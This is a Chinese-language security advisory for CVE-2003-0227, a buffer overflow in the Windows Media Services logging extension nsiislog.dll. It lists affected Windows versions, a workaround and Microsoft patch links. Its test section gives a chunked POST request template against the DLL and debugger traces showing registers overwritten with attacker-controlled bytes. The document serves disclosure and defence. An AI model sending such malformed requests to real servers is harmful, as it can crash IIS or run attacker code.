发布日期：2003-05-27
更新日期：2003-05-30

受影响系统：

Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP
Microsoft Windows NT 4.0SP6a
Microsoft Windows NT 4.0SP6
Microsoft Windows NT 4.0SP5
Microsoft Windows NT 4.0SP4
Microsoft Windows NT 4.0SP3
Microsoft Windows NT 4.0SP2
Microsoft Windows NT 4.0SP1
Microsoft Windows NT 4.0
Microsoft Windows 2003
Microsoft Windows 2000SP3
Microsoft Windows 2000SP2
Microsoft Windows 2000SP1
Microsoft Windows 2000

描述：

---

CVE(CAN) ID: CVE-2003-0227

Microsoft Windows媒体服务(Media Services)是Microsoft Windows 2000 Server、Advanced Server和Datacenter Server包含的服务，支持通过多播流从网络上传送媒体内容给客户端。

Microsoft Windows媒体服务的ISAPI扩展实现对用户请求处理存在缓冲区溢出漏洞，远程攻击者可以利用这个漏洞对服务进行拒绝服务攻击或执行任意指令。

在多播流中，为了能记录客户端信息，Windows 2000提供了多拨和单播传输进行记录的功能。此功能以ISAPI扩展实现 - nsiislog.dll，当Windows媒体服务安装在Windows NT 4.0服务器上或在Windows 2000中通过增加/删除程序进行安装时，nsiislog.dll就会安装在IIS脚本目录下。nsiislog.dll处理以分块编码方式发送的超长请求时存在缓冲区溢出漏洞，这可导致攻击者发送畸形请求给服务器，使IIS停止对Internet请求的响应或执行任意指令。

Windows媒体服务默认没有安装在Windows 2000上，在Windows NT 4.0上也需要下载安装完成。

<*来源：Brett Moore （brett.moore@SECURITY-ASSESSMENT.COM）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=105448964510652&w=2
        http://www.microsoft.com/technet/security/bulletin/MS03-019.asp
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Brett Moore （brett.moore@SECURITY-ASSESSMENT.COM）提供了如下测试方法：

POST /scripts/nsiislog.dll HTTP/1.1
Transfer-Encoding: chunked

PostLength
PostData
0

Using Size: 121
Connecting....Sending Buffer....
78003F25   dec         dword ptr [ecx+0ACh]
-
7800F5ED   dec         dword ptr [esi]          ESI = 58585858

Using Size: 510
Connecting....Sending Buffer....
77FC8FE1   mov         dword ptr [ecx],eax      EAX = 58585858
                                                ECX = 58585858

Using Size: 5000
Connecting....Sending Buffer....
40F01DCC   rep movs    dword ptr [edi],dword ptr [esi]
-
77FC8FE1   mov         dword ptr [ecx],eax      EAX = 58585858
                                                ECX = 58585858

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 暂时删除或者禁用nsiislog.dll，这不会影响媒体服务的正常工作。

厂商补丁：

Microsoft
---------
Microsoft已经为此发布了一个安全公告（MS03-019）以及相应补丁:
MS03-019：Flaw in ISAPI Extension for Windows Media Services Could Cause Denial of Service (817772)
链接：http://www.microsoft.com/technet/security/bulletin/MS03-019.asp

补丁下载：

Microsoft Windows NT 4.0:

http://microsoft.com/downloads/details.aspx?FamilyId=8D7E3716-1AA7-4EDC-B084-7D50C8D3C2AB&displaylang=en

Microsoft Windows 2000:

http://microsoft.com/downloads/details.aspx?FamilyId=9EFA4EBD-2068-4742-917D-A2638688C029&displaylang=en

浏览次数：3752
严重程度：0（网友投票）